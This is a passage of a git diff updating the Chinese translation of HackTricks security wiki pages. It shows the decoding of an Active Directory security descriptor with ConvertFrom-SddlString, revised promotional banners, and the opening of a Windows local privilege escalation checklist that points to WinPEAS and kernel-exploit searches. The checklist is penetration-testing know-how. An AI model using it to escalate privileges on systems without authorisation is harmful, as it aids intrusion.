14-1164)(OA;CI;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CC;4828cc14-1437-45bc-9b07-ad6f015e5f28;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a86-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a9c-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aa5-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aba-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;5cb41ed0-0e4c-11d0-a286-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;RP;4c164200-20c0-11d0-a768-00aa006e0529;;S-1-5-21-3842939050-3880317879-2865463114-5181)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;9a7ad945-ca53-11d1-bbd0-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967991-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a0a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;9a9a021e-4a5b-11d1-a9c3-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;0296c120-40da-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;934de926-b09e-11d2-aa06-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5e353847-f36c-48be-a7f7-49685402503c;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;8d3bca50-1d7e-11d0-a081-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;e48d0154-bcf8-11d1-8702-00c04fb96050;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;275b2f54-982d-4dcd-b0ad-e53501445efb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5fd42471-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5430e777-c3ea-4024-902e-dde192204669;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;6f606079-3a82-4c1b-8efb-dcc8c91d26fe;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a7a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;bf967a7f-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;614aea82-abc6-4dd0-a148-d67a59c72816;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;66437984-c3c5-498f-b269-987819ef484b;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;2cc06e9d-6f7e-426a-8825-0215de176e11;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;3263e3b8-fd6b-4c60-87f2-34bdaa9d69eb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf9679c0-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e0abfd0-126a-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;7cb4c7d3-8787-42b0-b438-3c5d479ad31e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-3842939050-3880317879-2865463114-526)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-384
-```markdown
+PS C:\> ConvertFrom-SddlString "O:BAG:BAD:AI(D;;DC;;;WD)(OA;CI;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CR;00299570-246d-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-3842939050-3880317879-2865463114-522)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-498)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;CI;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CC;4828cc14-1437-45bc-9b07-ad6f015e5f28;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a86-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a9c-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aa5-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aba-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;5cb41ed0-0e4c-11d0-a286-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;RP;4c164200-20c0-11d0-a768-00aa006e0529;;S-1-5-21-3842939050-3880317879-2865463114-5181)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;9a7ad945-ca53-11d1-bbd0-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967991-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a0a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;9a9a021e-4a5b-11d1-a9c3-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;0296c120-40da-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;934de926-b09e-11d2-aa06-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5e353847-f36c-48be-a7f7-49685402503c;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;8d3bca50-1d7e-11d0-a081-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;e48d0154-bcf8-11d1-8702-00c04fb96050;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;275b2f54-982d-4dcd-b0ad-e53501445efb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5fd42471-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5430e777-c3ea-4024-902e-dde192204669;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;6f606079-3a82-4c1b-8efb-dcc8c91d26fe;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a7a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;bf967a7f-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;614aea82-abc6-4dd0-a148-d67a59c72816;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;66437984-c3c5-498f-b269-987819ef484b;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;2cc06e9d-6f7e-426a-8825-0215de176e11;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;3263e3b8-fd6b-4c60-87f2-34bdaa9d69eb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf9679c0-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e0abfd0-126a-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;7cb4c7d3-8787-42b0-b438-3c5d479ad31e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-3842939050-3880317879-2865463114-526)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-3842939050-3880317879-2865463114-527)(OA;CI;DTWD;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;DTWD;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CCDCLCRPWPLO;f0f8ffac-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;CCDCLCRPWPLO;e8b2aff2-59a7-4eac-9a70-819adef701dd;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;018849b0-a981-11d2-a9ff-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;018849b0-a981-11d2-a9ff-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;SD;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967aa5-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;5cb41ed0-0e4c-11d0-a286-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;WD;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;CO)(OA;CIIO;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;CIIO;CCDCLCSWRPWPDTLOCRSDRCWDWO;;c975c901-6cea-4b6f-8319-d67f45449506;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;CCDCLCSWRPWPDTLOCRSDRCWDWO;;f0f8ffac-1191-11d0-a060-00aa006c33ed;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CINPIO;RPWPLOSD;;e8b2aff2-59a7-4eac-9a70-819adef701dd;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;NS)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;AU)(OA;CI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;LCSWRPWPRC;;;S-1-5-21-3842939050-3880317879-2865463114-5213)(A;CI;LCRPLORC;;;S-1-5-21-3842939050-3880317879-2865463114-5172)(A;CI;LCRPLORC;;;S-1-5-21-3842939050-3880317879-2865463114-5187)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3842939050-3880317879-2865463114-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;CI;LCRPWPRC;;;AN)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)"
+
Owner : BUILTIN\Administrators
Group : BUILTIN\Administrators
-DiscretionaryAcl : {Everyone: AccessDenied (WriteData), Everyone: AccessAllowed (WriteExtendedAttributes), NT AUTHORITY\ANONYMOUS LOGON: AccessAllowed (CreateDirectories, GenericExecute, ReadPermissions, Traverse, WriteExtendedAttributes), NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS: AccessAllowed (CreateDirectories, GenericExecute, GenericRead, ReadAttributes, ReadPermissions, WriteExtendedAttributes)...}
-SystemAcl : {Everyone: SystemAudit SuccessfulAccess (ChangePermissions, TakeOwnership, Traverse), BUILTIN\Administrators: SystemAudit SuccessfulAccess (WriteAttributes), DOMAIN_NAME\Domain Users: SystemAudit SuccessfulAccess (WriteAttributes), Everyone: SystemAudit SuccessfulAccess (Traverse)...}
+DiscretionaryAcl : {Everyone: AccessDenied (WriteData), Everyone: AccessAllowed (WriteExtendedAttributes), NT
+AUTHORITY\ANONYMOUS LOGON: AccessAllowed (CreateDirectories, GenericExecute, ReadPermissions,
+Traverse, WriteExtendedAttributes), NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS: AccessAllowed
+(CreateDirectories, GenericExecute, GenericRead, ReadAttributes, ReadPermissions,
+WriteExtendedAttributes)...}
+SystemAcl : {Everyone: SystemAudit SuccessfulAccess (ChangePermissions, TakeOwnership, Traverse),
+BUILTIN\Administrators: SystemAudit SuccessfulAccess (WriteAttributes), DOMAIN_NAME\Domain Users:
+SystemAudit SuccessfulAccess (WriteAttributes), Everyone: SystemAudit SuccessfulAccess
+(Traverse)...}
RawDescriptor : System.Security.AccessControl.CommonSecurityDescriptor
```
+{% hint style="success" %}
+学习与实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习与实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
+支持 HackTricks
-其他支持HackTricks的方式:
-
-* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
-* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
-* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
-* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
+{% endhint %}
diff --git a/windows-hardening/checklist-windows-privilege-escalation.md b/windows-hardening/checklist-windows-privilege-escalation.md
index 631630e24..196400058 100644
--- a/windows-hardening/checklist-windows-privilege-escalation.md
+++ b/windows-hardening/checklist-windows-privilege-escalation.md
@@ -1,20 +1,21 @@
-# Checklist - Local Windows Privilege Escalation
+# 检查清单 - 本地 Windows 权限提升
+
+{% hint style="success" %}
+学习和实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习和实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
+支持 HackTricks
-支持HackTricks的其他方式:
-
-* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
-* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
-* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
-* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %}
-**Try Hard Security Group**
+**努力安全小组**
@@ -22,131 +23,132 @@
***
-### **查找Windows本地权限提升向量的最佳工具:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
+### **查找 Windows 本地权限提升向量的最佳工具:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
### [系统信息](windows-local-privilege-escalation/#system-info)
-* [ ] 获取[**系统信息**](windows-local-privilege-escalation/#system-info)
-* [ ] 使用脚本搜索**内核**[**漏洞**](windows-local-privilege-escalation/#version-exploits)
-* [ ] 使用**Google搜索**内核**漏洞**
-* [ ] 使用**searchsploit搜索**内核**漏洞**
-* [ ] [**环境变量**](windows-local-privilege-escalation/#environment)中有趣的信息?
